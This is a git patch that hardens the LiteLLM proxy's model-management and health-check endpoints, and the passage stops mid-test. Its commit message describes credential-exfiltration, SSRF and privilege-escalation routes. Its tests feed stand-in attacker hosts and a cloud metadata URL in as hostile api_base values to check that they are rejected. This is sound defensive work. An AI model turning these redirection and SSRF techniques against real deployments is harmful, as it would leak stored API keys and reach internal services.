From 3fdf9d9b1a0c6e2ac133a3bfdcef9e02419d2b0d Mon Sep 17 00:00:00 2001 From: user <70670632+stuxf@users.noreply.github.com> Date: Sun, 31 May 2026 05:18:46 +0000 Subject: [PATCH] chore(proxy): tighten model-management authorization and stored-credential handling The model-management write paths (POST /model/new, POST /model/update, PATCH /model/{id}/update) and POST /health/test_connection authorized callers at the whole-model level but applied no field-level checks and derived team scope from the request body rather than the persisted row. A team admin could rename a team model into the global routing pool by omitting model_info, zero out a model's pricing to escape budget tracking, bind another tenant's stored credential by name, point an existing model's api_base at an attacker host while keeping the encrypted key, reach internal/metadata endpoints via api_base, spoof a deployment id to delete a config-based model, and (via /health/test_connection) probe any deployment by id and exfiltrate its inherited key to a request-supplied api_base. Team scope is now inherited from the persisted row when a PATCH omits it (so a team model keeps its internal name and cannot be reassigned to another team); pricing fields and litellm_credential_name binding are restricted to proxy admins; team-scoped models created by non-admins must supply their own credential; api_base/base_url are SSRF-validated on write under the existing user_url_validation toggle; a stored credential is cleared when the destination changes without a fresh key so it is never silently re-pointed; the deployment id is pinned to the row primary key; /model/new rejects an id that collides with a live deployment and /model/delete only evicts DB-origin router entries; team aliases are removed by their public name; and /health/test_connection authorizes against the resolved deployment's owner and refuses to send an inherited credential to a caller-overridden destination. Adds unit coverage for each guard. --- .../health_endpoints/_health_endpoints.py | 78 ++- .../model_management_endpoints.py | 277 +++++++++- .../health_endpoints/test_health_endpoints.py | 155 ++++++ .../test_model_management_endpoints.py | 506 ++++++++++++++++++ 4 files changed, 1002 insertions(+), 14 deletions(-) diff --git a/litellm/proxy/health_endpoints/_health_endpoints.py b/litellm/proxy/health_endpoints/_health_endpoints.py index ba3aee75047..b6210cf7276 100644 --- a/litellm/proxy/health_endpoints/_health_endpoints.py +++ b/litellm/proxy/health_endpoints/_health_endpoints.py @@ -78,6 +78,49 @@ def _reject_os_environ_references(params: dict) -> None: stack.append(value) +_HEALTH_CREDENTIAL_FIELDS = ( + "api_key", + "aws_secret_access_key", + "aws_session_token", + "vertex_credentials", +) +_HEALTH_DESTINATION_FIELDS = ( + "api_base", + "base_url", + "api_version", + "vertex_location", + "vertex_project", + "aws_region_name", +) + + +def _reject_inherited_credential_redirect( + config_litellm_params: dict, request_litellm_params: dict +) -> None: + """Confused-deputy guard for /health/test_connection. + + If a credential is inherited from the resolved deployment (present in the + config params, not supplied by the request) while the request overrides the + connection target, the inherited secret would be sent to a caller-chosen + endpoint. Refuse it; the caller must supply their own credential or omit the + destination override. + """ + inherited_credential = any( + field in config_litellm_params and field not in request_litellm_params + for field in _HEALTH_CREDENTIAL_FIELDS + ) + overrides_destination = any( + field in request_litellm_params for field in _HEALTH_DESTINATION_FIELDS + ) + if inherited_credential and overrides_destination: + raise HTTPException( + status_code=400, + detail={ + "error": "Cannot override the connection target (e.g. api_base) while inheriting stored credentials. Supply your own api_key, or omit the destination override." + }, + ) + + def get_callback_identifier(callback): """ Get the callback identifier string, handling both strings and objects. @@ -1672,7 +1715,7 @@ async def health_liveliness_options(): tags=["health"], dependencies=[Depends(user_api_key_auth)], ) -async def test_model_connection( +async def test_model_connection( # noqa: PLR0915 request: Request, mode: Optional[ Literal[ @@ -1747,6 +1790,7 @@ async def test_model_connection( dict: A dictionary containing the health check result with either success information or error details. """ from litellm.proxy._types import CommonProxyErrors + from litellm.proxy.common_utils.resource_ownership import is_proxy_admin from litellm.proxy.management_endpoints.model_management_endpoints import ( ModelManagementAuthChecks, ) @@ -1766,11 +1810,23 @@ async def test_model_connection( # already resolved before reaching this endpoint; any remaining # reference must have come from the request body. _reject_os_environ_references(request_litellm_params) + # Binding a named global credential resolves it by name with no ownership + # model, so it is proxy-admin-only (consistent with model management). + if request_litellm_params.get("litellm_credential_name") and not is_proxy_admin( + user_api_key_dict + ): + raise HTTPException( + status_code=403, + detail={"error": "Only proxy admins can use litellm_credential_name."}, + ) model_name = request_litellm_params.get("model") # Look up model configuration from router if model name is provided # This gets the litellm_params from proxy config (with resolved env vars) config_litellm_params: dict = {} + # model_info of the deployment resolved by id; used to authorize against + # the deployment's real owner rather than the caller-supplied model_info. + resolved_model_info: Optional[dict] = None if llm_router is not None: # Prefer disambiguation by deployment id (`model_info.id`) when # the caller supplies it. This is required when multiple @@ -1793,6 +1849,9 @@ async def test_model_connection( config_litellm_params = deployment_by_id.litellm_params.model_dump( exclude_none=True ) + resolved_model_info = deployment_by_id.model_info.model_dump( + exclude_none=True + ) elif model_name: # Fall back to model_name lookup for callers (e.g. the # "Add Model" wizard, or curl) that don't supply an id. @@ -1829,12 +1888,25 @@ async def test_model_connection( # This allows users to override specific params while using config for credentials litellm_params = {**config_litellm_params, **request_litellm_params} - ## Auth check + # Refuse sending an inherited credential to a caller-overridden destination. + _reject_inherited_credential_redirect( + config_litellm_params=config_litellm_params, + request_litellm_params=request_litellm_params, + ) + + ## Auth check — when the deployment was resolved by id, authorize against + ## its real owner (model_info), not the caller-supplied model_info, so a + ## team admin cannot probe another team's deployment by passing their own + ## team_id. await ModelManagementAuthChecks.can_user_make_model_call( model_params=Deployment( model_name="test_model", litellm_params=LiteLLM_Params(**litellm_params), - model_info=model_info, + model_info=( + resolved_model_info + if resolved_model_info is not None + else model_info + ), ), user_api_key_dict=user_api_key_dict, prisma_client=prisma_client, diff --git a/litellm/proxy/management_endpoints/model_management_endpoints.py b/litellm/proxy/management_endpoints/model_management_endpoints.py index 722fcd30033..2c55bd9e199 100644 --- a/litellm/proxy/management_endpoints/model_management_endpoints.py +++ b/litellm/proxy/management_endpoints/model_management_endpoints.py @@ -13,11 +13,12 @@ model/{model_id}/update - PATCH endpoint for model update. import asyncio import datetime import json -from typing import Dict, List, Literal, Optional, Tuple, Union, cast +from typing import Callable, Dict, List, Literal, Optional, Tuple, Union, cast from fastapi import APIRouter, Depends, HTTPException, Request, status from pydantic import BaseModel, ConfigDict, Field +import litellm from litellm._logging import verbose_proxy_logger from litellm._uuid import uuid from litellm.constants import LITELLM_PROXY_ADMIN_NAME @@ -35,8 +36,13 @@ from litellm.proxy._types import ( TeamModelDeleteRequest, UserAPIKeyAuth, ) +from litellm.litellm_core_utils.url_utils import SSRFError, validate_url from litellm.proxy.auth.user_api_key_auth import user_api_key_auth -from litellm.proxy.common_utils.encrypt_decrypt_utils import encrypt_value_helper +from litellm.proxy.common_utils.encrypt_decrypt_utils import ( + decrypt_value_helper, + encrypt_value_helper, +) +from litellm.proxy.common_utils.resource_ownership import is_proxy_admin from litellm.proxy.management_endpoints.common_utils import _is_user_team_admin from litellm.proxy.management_endpoints.team_endpoints import ( team_model_add, @@ -62,6 +68,142 @@ from litellm.utils import get_utc_datetime router = APIRouter() +# Credential fields that must never be silently re-pointed at a new endpoint, +# and the routing fields that change where they are sent. +_CREDENTIAL_LITELLM_PARAMS = ( + "api_key", + "litellm_credential_name", + "aws_secret_access_key", + "aws_session_token", + "vertex_credentials", +) +_DESTINATION_LITELLM_PARAMS = ("api_base", "base_url", "custom_llm_provider") + + +def _field_explicitly_set(model: Optional[BaseModel], field: str) -> bool: + """True if `field` was explicitly provided (to a value or null) on a model.""" + return model is not None and field in model.model_fields_set + + +def _validate_model_url_params(litellm_params: dict) -> None: + """SSRF-guard api_base/base_url on stored model configs, mirroring the + request-time guard in auth_utils.is_request_body_safe so the proxy applies + one consistent policy. Gated on litellm.user_url_validation (default True) + with user_url_allowed_hosts as the escape hatch for internal endpoints.""" + if not getattr(litellm, "user_url_validation", False): + return + for url_field in ("api_base", "base_url"): + url_value = litellm_params.get(url_field) + if not url_value or not isinstance(url_value, str): + continue + try: + validate_url(url_value) + except SSRFError as e: + raise ProxyException( + message=( + f"{url_field}={url_value!r} is rejected by the SSRF guard " + f"({e}). Add the host to general_settings.user_url_allowed_hosts " + "to allow it." + ), + type=ProxyErrorTypes.validation_error.value, + code=status.HTTP_400_BAD_REQUEST, + param=url_field, + ) + + +def _decrypted_param(value: object) -> object: + """Decrypt a stored litellm_param for comparison; non-string or + non-encrypted values pass through unchanged.""" + return ( + decrypt_value_helper(value, "litellm_param", return_original_value=True) + if isinstance(value, str) + else value + ) + + +def _strip_credentials_on_destination_change( + merged_litellm_params: dict, + patch_plaintext: dict, + db_plaintext: "Callable[[str], object]", +) -> None: + """If the patch changes a destination field (api_base/base_url/custom_llm_provider) + without supplying a fresh credential, drop the inherited secret(s) from the + merged params so a stored credential is never silently re-pointed at a new + (possibly attacker-controlled) endpoint.""" + destination_changed = any( + field in patch_plaintext and patch_plaintext[field] != db_plaintext(field) + for field in _DESTINATION_LITELLM_PARAMS + ) + supplied_new_credential = any( + field in patch_plaintext for field in _CREDENTIAL_LITELLM_PARAMS + ) + if destination_changed and not supplied_new_credential: + for field in _CREDENTIAL_LITELLM_PARAMS: + merged_litellm_params.pop(field, None) + + +def _assert_privileged_model_fields_authorized( + litellm_params: Optional[BaseModel], + model_info: Optional[BaseModel], + user_api_key_dict: UserAPIKeyAuth, +) -> None: + """Pricing overrides and credential-name binding are proxy-admin-only. + + Per-token/character pricing (SPECIAL_MODEL_INFO_PARAMS) gates spend/budget + enforcement, so a non-admin must not set or clear it. litellm_credential_name + resolves a globally-stored credential by name with no ownership model, so + only a proxy admin may bind one to a model. + """ + if is_proxy_admin(user_api_key_dict): + return + for field in SPECIAL_MODEL_INFO_PARAMS: + if _field_explicitly_set(litellm_params, field) or _field_explicitly_set( + model_info, field + ): + raise ProxyException( + message=f"Only proxy admins can set model pricing fields (e.g. {field}).", + type=ProxyErrorTypes.auth_error.value, + code=status.HTTP_403_FORBIDDEN, + param=field, + ) + if ( + _field_explicitly_set(litellm_params, "litellm_credential_name") + and litellm_params.litellm_credential_name is not None # type: ignore + ): + raise ProxyException( + message="Only proxy admins can bind a stored credential (litellm_credential_name) to a model.", + type=ProxyErrorTypes.auth_error.value, + code=status.HTTP_403_FORBIDDEN, + param="litellm_credential_name", + ) + + +def _assert_team_model_has_own_credential( + model_params: Deployment, user_api_key_dict: UserAPIKeyAuth +) -> None: + """A team-scoped model created by a non-admin must carry its own credential, + so it cannot silently inherit the proxy's global provider keys at call time.""" + if is_proxy_admin(user_api_key_dict): + return + if model_params.model_info is None or model_params.model_info.team_id is None: + return + litellm_params = model_params.litellm_params + has_credential = any( + getattr(litellm_params, field, None) + for field in ("api_key", "aws_secret_access_key", "vertex_credentials") + ) + if not has_credential: + raise ProxyException( + message=( + "Team-scoped models must provide their own credential (e.g. " + "litellm_params.api_key) and cannot inherit the proxy's global keys." + ), + type=ProxyErrorTypes.validation_error.value, + code=status.HTTP_400_BAD_REQUEST, + param="litellm_params.api_key", + ) + + async def update_team(*args, **kwargs): """ Backward-compatible shim for tests/legacy call sites that patch this symbol. @@ -112,13 +254,16 @@ def update_db_model( merged_deployment_dict["model_name"] = updated_patch.model_name # update litellm params + patch_litellm_plaintext: dict = {} if updated_patch.litellm_params: + patch_litellm_plaintext = updated_patch.litellm_params.model_dump( + exclude_none=True + ) + # SSRF-guard the patched destination (api_base/base_url). + _validate_model_url_params(patch_litellm_plaintext) # Encrypt any sensitive values encrypted_params = { - k: encrypt_value_helper(v) - for k, v in updated_patch.litellm_params.model_dump( - exclude_none=True - ).items() + k: encrypt_value_helper(v) for k, v in patch_litellm_plaintext.items() } merged_deployment_dict["litellm_params"].update(encrypted_params) # type: ignore @@ -131,6 +276,13 @@ def update_db_model( updated_patch.model_info.model_dump(exclude_none=True) ) + # The deployment id is the immutable primary key; never let a patched (or + # freshly-constructed, auto-id'd) model_info blob change it. + if db_model.model_info is not None and db_model.model_info.id is not None: + merged_deployment_dict.setdefault("model_info", {})["id"] = ( # type: ignore + db_model.model_info.id + ) + # Honor explicit-null clears LAST, after both merges, so a model_info blob the UI # passes through (which today re-sends the OLD pricing on every save) cannot # silently undo a litellm_params clear via .update(). @@ -157,6 +309,18 @@ def update_db_model( merged_deployment_dict["model_info"].pop(field, None) # type: ignore merged_deployment_dict.get("litellm_params", {}).pop(field, None) # type: ignore + # Refuse to silently re-point a stored credential at a new endpoint: if the + # destination changed without a fresh credential, drop the inherited secret + # so it must be re-entered rather than forwarded to the new destination. + if updated_patch.litellm_params: + _strip_credentials_on_destination_change( + merged_deployment_dict["litellm_params"], # type: ignore + patch_litellm_plaintext, + lambda field: _decrypted_param( + getattr(db_model.litellm_params, field, None) + ), + ) + # convert to prisma compatible format prisma_compatible_model_dict = PrismaCompatibleUpdateDBModel() @@ -274,6 +438,13 @@ async def patch_model( param="blocked", ) + # Pricing overrides and credential binding are proxy-admin-only. + _assert_privileged_model_fields_authorized( + litellm_params=patch_data.litellm_params, + model_info=patch_data.model_info, + user_api_key_dict=user_api_key_dict, + ) + # Handle team model updates with proper alias management update_data = await _update_team_model_in_db( db_model=db_model, @@ -443,9 +614,32 @@ async def _update_team_model_in_db( premium_user=premium_user, ) - patch_team_id = patch_data.model_info.team_id if patch_data.model_info else None + db_team_id = db_model.model_info.team_id if db_model.model_info else None + explicit_patch_team_id = ( + patch_data.model_info.team_id if patch_data.model_info else None + ) - # No team_id in patch, proceed with standard update + # A team admin must not move a model to a different team. + if ( + explicit_patch_team_id is not None + and db_team_id is not None + and explicit_patch_team_id != db_team_id + ): + raise ProxyException( + message="Cannot reassign a model to a different team.", + type=ProxyErrorTypes.auth_error.value, + code=status.HTTP_403_FORBIDDEN, + param="model_info.team_id", + ) + + # Inherit the persisted team_id when the patch omits it, so a team-scoped + # model keeps its team scoping (and its internal model_name) instead of being + # renamed into the global pool via a model_info-less PATCH. + patch_team_id = ( + explicit_patch_team_id if explicit_patch_team_id is not None else db_team_id + ) + + # Genuinely non-team model: standard update. if patch_team_id is None: return update_db_model(db_model=db_model, updated_patch=patch_data) @@ -463,7 +657,6 @@ async def _update_team_model_in_db( patch_data.model_info.team_public_model_name = public_model_name # Check if team assignment is new or changed - db_team_id = db_model.model_info.team_id if db_model.model_info else None is_new_team_assignment = db_team_id != patch_team_id if is_new_team_assignment: @@ -826,7 +1019,13 @@ async def delete_model( # delete team model alias if model_params.model_info.team_id is not None: removed_model_aliases = await delete_team_model_alias( - public_model_name=model_params.model_name, + # The team alias is keyed on the PUBLIC model name; the internal + # model_name is the unique UUID, which never matches an alias, so + # using it here leaves the alias (and team.models entry) orphaned. + public_model_name=( + model_params.model_info.team_public_model_name + or model_params.model_name + ), prisma_client=prisma_client, ) @@ -870,8 +1069,16 @@ async def delete_model( ) ## DELETE FROM ROUTER ## + # Only evict a router deployment that originated from the DB. A + # config (static) deployment must never be removed by deleting a DB + # row, even if a row shares its id. if llm_router is not None: - llm_router.delete_deployment(id=model_info.id) + router_deployment = llm_router.get_deployment(model_id=model_info.id) + if ( + router_deployment is not None + and router_deployment.model_info.db_model + ): + llm_router.delete_deployment(id=model_info.id) ## CREATE AUDIT LOG ## asyncio.create_task( @@ -1002,6 +1209,7 @@ async def add_new_model( """ from litellm.proxy.proxy_server import ( general_settings, + llm_router, premium_user, prisma_client, proxy_config, @@ -1026,6 +1234,35 @@ async def add_new_model( premium_user=premium_user, ) + # Pricing overrides and credential binding are proxy-admin-only. + _assert_privileged_model_fields_authorized( + litellm_params=model_params.litellm_params, + model_info=model_params.model_info, + user_api_key_dict=user_api_key_dict, + ) + # A non-admin team model must carry its own credential (no global-key fallback). + _assert_team_model_has_own_credential(model_params, user_api_key_dict) + # SSRF-guard the destination on create. + _validate_model_url_params( + model_params.litellm_params.model_dump(exclude_none=True) + ) + # Reject a model_info.id that collides with a live deployment, so a DB + # row cannot hijack (and on delete evict) a config/router deployment's id. + if ( + model_params.model_info.id is not None + and llm_router is not None + and llm_router.has_model_id(model_params.model_info.id) + ): + raise ProxyException( + message=( + f"model_info.id={model_params.model_info.id} already belongs to an " + "existing deployment; omit model_info.id to auto-generate one." + ), + type=ProxyErrorTypes.validation_error.value, + code=status.HTTP_400_BAD_REQUEST, + param="model_info.id", + ) + model_response: Optional[LiteLLM_ProxyModelTable] = None # update DB if store_model_in_db is True: @@ -1192,6 +1429,13 @@ async def update_model( premium_user=premium_user, ) + # Pricing/credential field authz, parity with patch_model / add_new_model. + _assert_privileged_model_fields_authorized( + litellm_params=model_params.litellm_params, + model_info=model_params.model_info, + user_api_key_dict=user_api_key_dict, + ) + # update DB if store_model_in_db is True: _existing_litellm_params_dict = dict( @@ -1204,6 +1448,8 @@ async def update_model( _new_litellm_params_dict = model_params.litellm_params.dict( exclude_none=True ) + # SSRF-guard the patched destination on this legacy update path too. + _validate_model_url_params(_new_litellm_params_dict) ### ENCRYPT PARAMS ### for k, v in _new_litellm_params_dict.items(): @@ -1225,6 +1471,15 @@ async def update_model( else: pass + # Don't silently re-point an inherited credential at a new endpoint. + _strip_credentials_on_destination_change( + merged_dictionary, + _new_litellm_params_dict, + lambda field: _decrypted_param( + _existing_litellm_params_dict.get(field) + ), + ) + _data: dict = { "litellm_params": json.dumps(merged_dictionary), # type: ignore "updated_by": user_api_key_dict.user_id or LITELLM_PROXY_ADMIN_NAME, diff --git a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py index 80a4804956c..58431ad5994 100644 --- a/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py +++ b/tests/test_litellm/proxy/health_endpoints/test_health_endpoints.py @@ -1,3 +1,4 @@ +import contextlib import os import sys import time @@ -1823,3 +1824,157 @@ def test_clean_endpoint_data_strips_credentials_keeps_routing_fields(): assert "aws_access_key_id" not in cleaned assert cleaned.get("api_base") == "https://example.test/v1" assert cleaned.get("api_version") == "2024-10-21" + + +# --------------------------------------------------------------------------- +# VERIA-120: /health/test_connection confused-deputy hardening +# --------------------------------------------------------------------------- + + +def _health_test_connection_patches(mock_prisma, mock_router, mock_auth, mock_ahealth): + def _noop_update(model_info, litellm_params): + params = litellm_params.copy() + params["messages"] = [{"role": "user", "content": "x"}] + return params + + return ( + patch("litellm.proxy.proxy_server.prisma_client", mock_prisma), + patch("litellm.proxy.proxy_server.llm_router", mock_router), + patch("litellm.proxy.proxy_server.premium_user", True), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.ModelManagementAuthChecks.can_user_make_model_call", + mock_auth, + ), + patch( + "litellm.proxy.health_endpoints._health_endpoints.litellm.ahealth_check", + mock_ahealth, + ), + patch( + "litellm.proxy.health_endpoints._health_endpoints.run_with_timeout", + AsyncMock(return_value={"status": "healthy"}), + ), + patch( + "litellm.proxy.health_endpoints._health_endpoints._update_litellm_params_for_health_check", + _noop_update, + ), + patch( + "litellm.proxy.health_endpoints._health_endpoints._reject_os_environ_references", + lambda params: None, + ), + ) + + +@pytest.mark.asyncio +async def test_test_connection_authorizes_against_resolved_deployment_owner(): + """A team admin must not probe another team's deployment by id: the auth + check must run against the RESOLVED deployment's team_id, not the + caller-supplied model_info.team_id.""" + from litellm.types.router import Deployment, LiteLLM_Params + + victim = Deployment( + model_name="victim", + litellm_params=LiteLLM_Params( + model="azure/gpt-4o", + api_key="sk-victim", + api_base="https://victim.example/v1", + ), + model_info={"id": "victim-id", "team_id": "team-OWNER"}, + ) + mock_router = MagicMock() + mock_router.get_deployment.side_effect = lambda model_id: ( + victim if model_id == "victim-id" else None + ) + + captured = {} + + async def _capture(*, model_params, **kwargs): + captured["team_id"] = model_params.model_info.team_id + return True + + mock_auth = AsyncMock(side_effect=_capture) + mock_ahealth = AsyncMock(return_value={"status": "healthy"}) + + with contextlib.ExitStack() as stack: + for p in _health_test_connection_patches( + MagicMock(), mock_router, mock_auth, mock_ahealth + ): + stack.enter_context(p) + await health_test_model_connection( + request=MagicMock(), + mode="chat", + litellm_params={"model": "azure/gpt-4o"}, # no destination override + model_info={"id": "victim-id", "team_id": "team-ATTACKER"}, + user_api_key_dict=MagicMock(user_id="attacker", token="t"), + ) + + assert captured.get("team_id") == "team-OWNER" + + +@pytest.mark.asyncio +async def test_test_connection_rejects_inherited_key_with_api_base_override(): + """Refuse to send an inherited config api_key to a request-overridden + api_base (the credential-exfiltration vector).""" + from fastapi import HTTPException + + from litellm.types.router import Deployment, LiteLLM_Params + + victim = Deployment( + model_name="victim", + litellm_params=LiteLLM_Params( + model="azure/gpt-4o", + api_key="sk-victim", + api_base="https://victim.example/v1", + ), + model_info={"id": "victim-id", "team_id": "team-OWNER"}, + ) + mock_router = MagicMock() + mock_router.get_deployment.side_effect = lambda model_id: ( + victim if model_id == "victim-id" else None + ) + mock_auth = AsyncMock(return_value=True) + mock_ahealth = AsyncMock(return_value={"status": "healthy"}) + + with contextlib.ExitStack() as stack: + for p in _health_test_connection_patches( + MagicMock(), mock_router, mock_auth, mock_ahealth + ): + stack.enter_context(p) + with pytest.raises(HTTPException) as exc_info: + await health_test_model_connection( + request=MagicMock(), + mode="chat", + litellm_params={ + "model": "azure/gpt-4o", + "api_base": "https://attacker.example/v1", # override, no api_key + }, + model_info={"id": "victim-id"}, + user_api_key_dict=MagicMock(user_id="attacker", token="t"), + ) + assert exc_info.value.status_code == 400 + + mock_ahealth.assert_not_called() # the inherited key never went out + + +def test_reject_inherited_credential_redirect_helper(): + from fastapi import HTTPException + + from litellm.proxy.health_endpoints._health_endpoints import ( + _reject_inherited_credential_redirect, + ) + + # inherited credential + overridden destination -> rejected + with pytest.raises(HTTPException): + _reject_inherited_credential_redirect( + config_litellm_params={"api_key": "sk-x", "api_base": "https://real"}, + request_litellm_params={"api_base": "https://attacker"}, + ) + # request supplies its own credential -> allowed + _reject_inherited_credential_redirect( + config_litellm_params={"api_key": "sk-x"}, + request_litellm_params={"api_key": "sk-own", "api_base": "https://attacker"}, + ) + # no destination override -> allowed + _reject_inherited_credential_redirect( + config_litellm_params={"api_key": "sk-x"}, + request_litellm_params={"model": "gpt-4o"}, + ) diff --git a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py index 85c7c130b36..eaab7e61263 100644 --- a/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py +++ b/tests/test_litellm/proxy/management_endpoints/test_model_management_endpoints.py @@ -1315,6 +1315,8 @@ class TestAddAndDeleteModelLifecycle: mock_router = MagicMock() mock_router.delete_deployment = MagicMock() + # The new model id is not already live in the router (no collision). + mock_router.has_model_id = MagicMock(return_value=False) _PS = "litellm.proxy.proxy_server" _ENCRYPT = "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper" @@ -1917,3 +1919,507 @@ class TestPatchModelBlockedAuthGate: ) assert result is updated_row mock_prisma.db.litellm_proxymodeltable.update.assert_awaited_once() + + +class TestModelMgmtAuthzHardening: + """Regression tests for the model-management authorization cluster. + + Each test fails on the unpatched code path it targets and passes only with + the corresponding guard in place. + """ + + # --- update_db_model: id pin + SSRF + credential re-point (115c / 111) --- + + def _db_model_with_secret(self): + from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo + + return Deployment( + model_name="m", + litellm_params=LiteLLM_Params( + model="openai/gpt-4", + api_key="sk-real", + api_base="https://real.example.com", + ), + model_info=ModelInfo(id="real-id"), + ) + + def test_patch_cannot_change_stored_model_id(self): + from litellm.proxy.management_endpoints.model_management_endpoints import ( + update_db_model, + ) + from litellm.types.router import ModelInfo + + result = update_db_model( + db_model=self._db_model_with_secret(), + updated_patch=updateDeployment(model_info=ModelInfo(id="spoofed-id")), + ) + info = json.loads(result["model_info"]) + assert info["id"] == "real-id" + + def test_api_base_change_clears_inherited_credential(self): + import litellm + from litellm.proxy.management_endpoints.model_management_endpoints import ( + update_db_model, + ) + from litellm.types.router import updateLiteLLMParams + + with ( + patch.object(litellm, "user_url_validation", False), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper", + side_effect=lambda value, **kwargs: value, + ), + ): + result = update_db_model( + db_model=self._db_model_with_secret(), + updated_patch=updateDeployment( + litellm_params=updateLiteLLMParams( + api_base="https://attacker.example.com" + ) + ), + ) + params = json.loads(result["litellm_params"]) + assert "api_key" not in params # stored secret must not ride to new base + + def test_api_base_change_with_new_key_keeps_credential(self): + import litellm + from litellm.proxy.management_endpoints.model_management_endpoints import ( + update_db_model, + ) + from litellm.types.router import updateLiteLLMParams + + with ( + patch.object(litellm, "user_url_validation", False), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper", + side_effect=lambda value, **kwargs: value, + ), + ): + result = update_db_model( + db_model=self._db_model_with_secret(), + updated_patch=updateDeployment( + litellm_params=updateLiteLLMParams( + api_base="https://attacker.example.com", api_key="sk-new" + ) + ), + ) + params = json.loads(result["litellm_params"]) + assert "api_key" in params # caller re-supplied a key, so it is kept + + def test_unchanged_destination_keeps_credential(self): + import litellm + from litellm.proxy.management_endpoints.model_management_endpoints import ( + update_db_model, + ) + from litellm.types.router import updateLiteLLMParams + + # Re-saving the same api_base (e.g. a UI resend) must NOT clear the key. + with ( + patch.object(litellm, "user_url_validation", False), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper", + side_effect=lambda value, **kwargs: value, + ), + ): + result = update_db_model( + db_model=self._db_model_with_secret(), + updated_patch=updateDeployment( + litellm_params=updateLiteLLMParams( + api_base="https://real.example.com" + ) + ), + ) + params = json.loads(result["litellm_params"]) + assert "api_key" in params + + def test_validate_model_url_params_blocks_internal_ip(self): + import litellm + from litellm.proxy._types import ProxyException + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _validate_model_url_params, + ) + + with patch.object(litellm, "user_url_validation", True): + with pytest.raises(ProxyException): + _validate_model_url_params( + {"api_base": "http://169.254.169.254/latest/meta-data/"} + ) + # Honors the opt-out toggle (internal endpoints / Ollama). + with ( + patch.object(litellm, "user_url_validation", False), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.encrypt_value_helper", + side_effect=lambda value, **kwargs: value, + ), + ): + _validate_model_url_params({"api_base": "http://169.254.169.254/"}) + + # --- field-level authorization (173b / 115b / 173a) --- + + def _non_admin(self): + return UserAPIKeyAuth( + user_id="team-admin", user_role=LitellmUserRoles.INTERNAL_USER + ) + + def _admin(self): + return UserAPIKeyAuth(user_id="admin", user_role=LitellmUserRoles.PROXY_ADMIN) + + def test_pricing_fields_are_proxy_admin_only(self): + from litellm.proxy._types import ProxyException + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _assert_privileged_model_fields_authorized, + ) + from litellm.types.router import updateLiteLLMParams + + # Non-admin setting pricing -> rejected. + with pytest.raises(ProxyException) as e: + _assert_privileged_model_fields_authorized( + litellm_params=updateLiteLLMParams(input_cost_per_token=0.0), + model_info=None, + user_api_key_dict=self._non_admin(), + ) + assert str(e.value.code) == "403" + # Non-admin clearing pricing (explicit null) -> also rejected. + with pytest.raises(ProxyException): + _assert_privileged_model_fields_authorized( + litellm_params=updateLiteLLMParams(output_cost_per_token=None), + model_info=None, + user_api_key_dict=self._non_admin(), + ) + # Proxy admin -> allowed. + _assert_privileged_model_fields_authorized( + litellm_params=updateLiteLLMParams(input_cost_per_token=0.0), + model_info=None, + user_api_key_dict=self._admin(), + ) + + def test_credential_name_binding_is_proxy_admin_only(self): + from litellm.proxy._types import ProxyException + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _assert_privileged_model_fields_authorized, + ) + from litellm.types.router import updateLiteLLMParams + + with pytest.raises(ProxyException) as e: + _assert_privileged_model_fields_authorized( + litellm_params=updateLiteLLMParams( + litellm_credential_name="someone-elses-cred" + ), + model_info=None, + user_api_key_dict=self._non_admin(), + ) + assert str(e.value.code) == "403" + # Admin may bind a stored credential. + _assert_privileged_model_fields_authorized( + litellm_params=updateLiteLLMParams(litellm_credential_name="shared-cred"), + model_info=None, + user_api_key_dict=self._admin(), + ) + + def test_team_model_requires_own_credential(self): + from litellm.proxy._types import ProxyException + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _assert_team_model_has_own_credential, + ) + from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo + + keyless_team_model = Deployment( + model_name="team-gpt", + litellm_params=LiteLLM_Params(model="openai/gpt-4"), + model_info=ModelInfo(team_id="team-x"), + ) + with pytest.raises(ProxyException) as e: + _assert_team_model_has_own_credential(keyless_team_model, self._non_admin()) + assert str(e.value.code) == "400" + # With its own key -> allowed. + keyed_team_model = Deployment( + model_name="team-gpt", + litellm_params=LiteLLM_Params(model="openai/gpt-4", api_key="sk-team"), + model_info=ModelInfo(team_id="team-x"), + ) + _assert_team_model_has_own_credential(keyed_team_model, self._non_admin()) + # Proxy admin may create a key-less team model (uses configured keys). + _assert_team_model_has_own_credential(keyless_team_model, self._admin()) + + # --- team-scope inheritance: cannot rename a team model into the global pool (115a / 168a) --- + + @pytest.mark.asyncio + async def test_team_model_cannot_be_renamed_to_global_via_omitted_model_info(self): + from litellm.proxy.management_endpoints.model_management_endpoints import ( + _update_team_model_in_db, + ) + from litellm.types.router import Deployment, LiteLLM_Params, ModelInfo + + db_model = Deployment( + model_name="model_name_teamX_abc123", + litellm_params=LiteLLM_Params(model="azure/gpt-4o", api_key="sk-team"), + model_info=ModelInfo( + team_id="teamX", team_public_model_name="my-team-alias" + ), + ) + # Attacker PATCHes only model_name (omits model_info) to a global name. + patch_data = updateDeployment(model_name="gpt-4") + admin_of_team = UserAPIKeyAuth( + user_id="team-admin", user_role=LitellmUserRoles.INTERNAL_USER + ) + + with ( + patch("litellm.proxy.proxy_server.premium_user", True), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.team_model_add" + ), + patch( + "litellm.proxy.management_endpoints.model_management_endpoints.team_model_delete" + ), + ): + result = await _update_team_model_in_db( + db_model=db_model, + patch_data=patch_data, + user_api_key_dict=admin_of_team, + prisma_client=MockPrismaClient(team_exists=True), # type: ignore + ) + + # The internal team model_name must be preserved, not overwritten to "gpt-4". + assert result.get("model_name", "model_name_teamX_abc123").startswith( + 